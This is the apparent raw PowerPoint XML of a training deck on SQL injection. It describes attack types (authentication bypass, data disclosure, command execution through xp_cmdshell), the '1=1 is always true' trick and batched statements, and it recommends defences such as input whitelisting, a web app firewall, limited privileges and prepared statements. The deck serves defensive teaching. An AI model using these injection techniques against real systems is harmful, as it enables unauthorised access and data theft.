                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>is_numeric</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(), </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>settype</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eb app firewall</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>ModSecurity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Imperva</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Limited privileges</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Never </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>connect to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DB as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>super </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Avoid constructing SQL queries with user input</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="1" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL variable binding &amp; prepared statements</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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3107896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Warm up</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Is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>a technique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>malicious users </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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Inject </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL commands into an SQL statement, via web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input.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Alter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL statement and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>break down security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>of a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>web app</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smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Number one </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>thread to web applications (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>OWASP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>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327154" y="1018034"/>
            <a:ext cx="1506520" cy="2008693"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3381112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20</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Index.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1679737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21</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Index2.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33341604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22</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Index3.php</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="37963709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23</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Title 1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="125944" y="108402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Want to see a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>real hack?</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rPr>
              <a:t>Let’s go!!!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="11489581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YOU FOR YOUR ATTENTION!</a:t>
            </a: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24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>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Behind the scene</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Insufficient input validation </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="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Improper </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>construction of SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>statements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41966704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Types of attack</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="4000" dirty="0">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="267344" y="2161035"/>
            <a:ext cx="8876655" cy="41832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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Authentication Bypass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>log on app, even with admin role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b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Information Disclosure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: get </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sensitive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>info from database</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a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compromised Data Integrity</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Alter or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>insert malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>content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a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Compromised Availability of Data</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: Delete info, log, content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Remote Command Execution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> execution (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>xp_cmdshell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, exec)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23143575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1=1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is Always </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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10" name="Picture 9"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="348944" y="3947204"/>
            <a:ext cx="3634179" cy="846167"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="204499" y="5132196"/>
            <a:ext cx="8783063" cy="580449"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33988288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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> is Always True</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pP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6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="267344" y="3947106"/>
            <a:ext cx="3631444" cy="846266"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="13" name="Picture 12"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="204498" y="5262354"/>
            <a:ext cx="8783063" cy="523128"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28537562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Batched SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> Statements</a:t>
            </a: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8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="204498" y="4976485"/>
            <a:ext cx="8783063" cy="1010054"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="3976941"/>
            <a:ext cx="5049297" cy="859009"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40842094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8</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defend </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Blacklist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Whitelist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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>parameters &amp; prepared statements</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>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5726" y="870320"/>
            <a:ext cx="1385151" cy="1438427"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="13517276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April 28,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Blacklist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chemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="156437" y="2507530"/>
            <a:ext cx="8787275" cy="3724330"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="275317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40684</TotalTime>
  <Words>992</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (4:3)</PresentationFormat>
  <Paragraphs>324</Paragraphs>
  <Slides>24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Constantia</vt:lpstr>
      <vt:lpstr>Lucida Sans</vt:lpstr>
      <vt:lpstr>Times New Roman</vt:lpstr>
      <vt:lpstr>QSOFT VIETNAM</vt:lpstr>
      <vt:lpstr>SQL Injection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1228</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2011-07-05T15:47:08Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2015-05-04T02:56:43Z</dcterms:modified>
</cp:coreProperties>
</file>